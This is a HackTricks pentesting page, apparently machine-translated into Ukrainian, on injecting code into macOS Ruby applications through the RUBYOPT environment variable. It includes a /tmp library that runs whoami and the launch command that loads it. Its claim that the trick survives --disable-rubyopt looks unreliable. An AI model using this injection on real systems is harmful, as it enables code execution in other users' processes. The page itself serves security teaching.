macOS Ruby Applications Injection

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

RUBYOPT

Використовуючи цю змінну середовища, можна додати нові параметри до ruby щоразу, коли він виконується. Хоча параметр -e не може бути використаний для вказівки коду ruby для виконання, можна використовувати параметри -I та -r, щоб додати нову папку до шляху завантаження бібліотек, а потім вказати бібліотеку для завантаження.

Створіть бібліотеку inject.rb у /tmp:

inject.rb

puts `whoami`

Створіть будь-де скрипт ruby, наприклад:

hello.rb

puts 'Hello, World!'

Тоді створіть довільний ruby-скрипт, щоб завантажити його за допомогою:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Фунт факт, це працює навіть з параметром --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримати HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.

PreviousmacOS Python Applications Injection NextmacOS .Net Applications Injection

Last updated 1 month ago